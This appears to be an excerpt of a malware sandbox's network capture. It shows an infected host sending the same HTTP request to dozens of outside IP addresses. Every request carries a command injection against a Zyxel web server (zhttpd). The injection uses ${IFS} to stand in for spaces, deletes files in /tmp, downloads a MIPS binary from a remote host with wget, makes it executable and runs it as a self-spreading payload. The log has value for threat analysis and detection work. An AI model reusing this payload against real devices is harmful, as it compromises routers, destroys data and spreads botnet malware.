                              Mar 31, 2024 08:42:17.493848085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9275192.168.2.135914023.99.61.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493910074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9276192.168.2.1338472155.93.174.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493949890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9277192.168.2.134539893.228.148.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494005919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9278192.168.2.1351436194.215.184.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494057894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9279192.168.2.135386024.111.129.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494092941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9280192.168.2.1358000190.70.242.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494136095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9281192.168.2.135745486.5.76.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494196892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9282192.168.2.135357642.12.165.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494231939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9283192.168.2.134200431.182.180.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494286060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9284192.168.2.1356876197.237.149.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494332075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9285192.168.2.133704012.192.70.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494386911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9286192.168.2.1347398178.250.200.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494415998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9287192.168.2.1336234158.9.171.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494482994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9288192.168.2.135413018.23.198.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494507074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9289192.168.2.1360990147.0.112.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.494543076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9290192.168.2.1346534158.10.110.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.495448112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9291192.168.2.133741687.157.159.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.495507956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9292192.168.2.135848849.74.207.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.495568037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9293192.168.2.135924832.238.67.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501363993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9294192.168.2.136093820.136.153.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501409054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9295192.168.2.1349054136.224.154.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501445055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9296192.168.2.133289873.183.248.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501501083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9297192.168.2.135604664.254.252.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501563072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9298192.168.2.1354242154.34.187.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501595020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9299192.168.2.1359590147.192.214.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501663923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9300192.168.2.1352328137.200.200.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501688004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9301192.168.2.1339886175.78.208.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501697063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9302192.168.2.133692214.163.135.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501775026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9303192.168.2.1337294188.131.100.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501811028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9304192.168.2.133487438.171.190.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501841068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9305192.168.2.135049095.251.44.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501874924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9306192.168.2.1355198128.3.208.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501920938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9307192.168.2.134000863.117.250.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501969099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9308192.168.2.1355238193.211.181.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.501969099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9309192.168.2.1339354116.59.33.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502036095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9310192.168.2.135842254.101.223.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502067089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9311192.168.2.135232435.11.191.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502093077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9312192.168.2.133952020.57.63.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502152920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9313192.168.2.1346036203.233.238.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502198935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9314192.168.2.134340669.191.8.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502235889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9315192.168.2.1332790143.120.183.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502286911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9316192.168.2.1340758132.214.226.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502341986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9317192.168.2.1344324218.106.236.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502381086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9318192.168.2.1344184154.6.102.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502440929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9319192.168.2.1345240112.252.136.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502487898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9320192.168.2.134157638.133.69.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502549887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9321192.168.2.1357264223.80.157.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502604961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9322192.168.2.1343594177.30.196.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502639055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9323192.168.2.1345810204.12.153.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502681017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9324192.168.2.1351510140.207.31.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502727032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9325192.168.2.1347342131.173.3.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502767086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9326192.168.2.1351392158.239.35.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502803087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9327192.168.2.1337542159.130.181.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502821922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9328192.168.2.1342180101.46.77.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502871037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9329192.168.2.1353326160.191.125.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502895117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9330192.168.2.1352542181.80.196.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502932072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9331192.168.2.133685623.51.224.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.502969027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9332192.168.2.135961036.74.80.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.503010035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9333192.168.2.1357324220.130.110.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.503036976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9334192.168.2.1338528131.243.30.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:18.503092051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9335192.168.2.135623294.212.135.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509160995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9336192.168.2.134335489.144.160.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509205103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9337192.168.2.1349114116.175.27.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509243965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9338192.168.2.1340882202.232.69.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509294987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9339192.168.2.1359080157.78.113.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509371042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9340192.168.2.135344631.149.4.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509421110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9341192.168.2.1346440213.56.3.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509465933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9342192.168.2.1336356111.27.138.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509524107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9343192.168.2.135615896.88.166.223443
                              TimestampBytes transferredDirectionData
